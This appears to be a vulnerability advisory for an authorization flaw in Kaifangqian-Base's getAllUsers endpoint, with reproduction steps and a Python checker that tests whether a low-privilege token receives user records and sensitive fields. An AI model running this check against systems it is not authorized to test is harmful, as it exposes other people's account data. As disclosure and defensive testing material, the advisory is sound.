Kaifangqian Kaifangqian-Base Information Disclosure Vulnerability in SysUserController

Vulnerability

An information disclosure vulnerability has been identified in Kaifangqian Kaifangqian-Base in versions prior to commit 7b3faecda13848b3ced6c17c7423b76c5b47b8ab. The issue lies in the 'getAllUsers' function of SysUserController.java: the endpoint returns user records to any caller that presents a valid access token, without an adequate authorization check on who that caller is. The flaw can be exploited remotely and grants unauthorized access to sensitive user information.

Impact

Successful exploitation gives an authenticated but otherwise unprivileged caller access to user information held in the database, breaching confidentiality. Because the response is a listing of accounts, it also hands an attacker the account names needed for targeted follow-on attacks against those users.

Reproduction

To reproduce this vulnerability, send a GET request to the '/sys/user/getAllUsers' endpoint with a valid access token in the 'X-Access-Token' header. The check is whether the token of an ordinary, non-administrative account also receives the listing: on an affected version the response contains user information from the database that should only be returned after a proper authorization check.
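A small checker for the reproduction steps above, written as an added example for this page (it is not code from the Kaifangqian project or from the advisory's author). It issues the GET request with the token in X-Access-Token and reports whether user records came back and which sensitive fields they carried; the JSON envelope keys it tolerates ("result", "data", "records", "list"), the sensitive-field names, and the embedded sample response are assumptions and constructed data, not captured from a real system.

```python
#!/usr/bin/env python3
"""Check whether /sys/user/getAllUsers hands user records to a token that
should not be authorized to see them.

Added example for this advisory; not code from the Kaifangqian project.
Assumptions (not stated on the page): the endpoint answers in JSON, and the
envelope keys ("result", "data", "records", "list") and the SENSITIVE_FIELDS
names are guesses to be adjusted to the target.
"""
import json
import sys
import urllib.error
import urllib.request

ENDPOINT = "/sys/user/getAllUsers"  # from the advisory
TOKEN_HEADER = "X-Access-Token"     # from the advisory

# Keys an ordinary caller should never receive in a user listing (assumed names).
SENSITIVE_FIELDS = {"password", "salt", "phone", "email"}

# Constructed sample of what a vulnerable instance might return; used for the
# offline dry run below. Not captured from a real system.
SAMPLE_RESPONSE = json.dumps({
    "success": True,
    "result": [
        {"id": "1", "username": "admin", "phone": "13800000000", "password": "<hash>"},
        {"id": "2", "username": "alice", "email": "alice@example.com"},
    ],
}).encode()


def fetch_users(base_url, token, timeout=10.0):
    """Issue the GET from the reproduction steps; return (status, body)."""
    req = urllib.request.Request(base_url.rstrip("/") + ENDPOINT, method="GET")
    req.add_header(TOKEN_HEADER, token)
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as e:
        return e.code, e.read()


def extract_user_records(body):
    """Return the list of user objects in a JSON body, tolerating a bare list,
    {"result": [...]}, {"data": [...]} or {"result": {"records": [...]}}.
    Anything unrecognised yields []."""
    try:
        data = json.loads(body)
    except ValueError:
        return []
    if isinstance(data, list):
        items = data
    elif isinstance(data, dict):
        inner = data.get("result", data.get("data"))
        if isinstance(inner, dict):
            inner = inner.get("records", inner.get("list"))
        items = inner if isinstance(inner, list) else []
    else:
        items = []
    return [r for r in items if isinstance(r, dict)]


def assess(status, body):
    """Classify one response. 'exposed' is True when a 200 carries at least one
    user record; 'leaked_fields' lists which sensitive keys appeared."""
    records = extract_user_records(body) if status == 200 else []
    leaked = sorted({k.lower() for r in records for k in r if k.lower() in SENSITIVE_FIELDS})
    return {"status": status, "exposed": bool(records),
            "record_count": len(records), "leaked_fields": leaked}


def check_endpoint(base_url, token, fetch=fetch_users):
    """Run the check against base_url with the given token. `fetch` is
    injectable so the logic can be exercised offline."""
    status, body = fetch(base_url, token)
    return assess(status, body)


if __name__ == "__main__":
    if len(sys.argv) == 3:
        # Usage: getallusers_check.py https://target X_ACCESS_TOKEN_OF_LOW_PRIV_USER
        verdict = check_endpoint(sys.argv[1], sys.argv[2])
    else:
        # Offline dry run on the constructed sample.
        verdict = check_endpoint("http://example.invalid", "dummy",
                                 fetch=lambda b, t: (200, SAMPLE_RESPONSE))
    # Print only counts and field names, never the records themselves.
    print(json.dumps(verdict))
```

Run it with the token of a low-privilege account; a listing returned to an administrator is expected behaviour and proves nothing. The script deliberately reports only counts and field names so that a test run does not itself copy the leaked records into logs or screenshots.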

Added: Oct 7, 2025, 8:27 PM
Updated: Oct 7, 2025, 8:27 PM

Vulnerability Rating

Custom Algorithm

spread: 0.0
impact: 2.5
exploitability: 6.6
remediation: 0.0
relevance: 0.7
threat: 6.4
urgency: 2.9
incentive: 1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.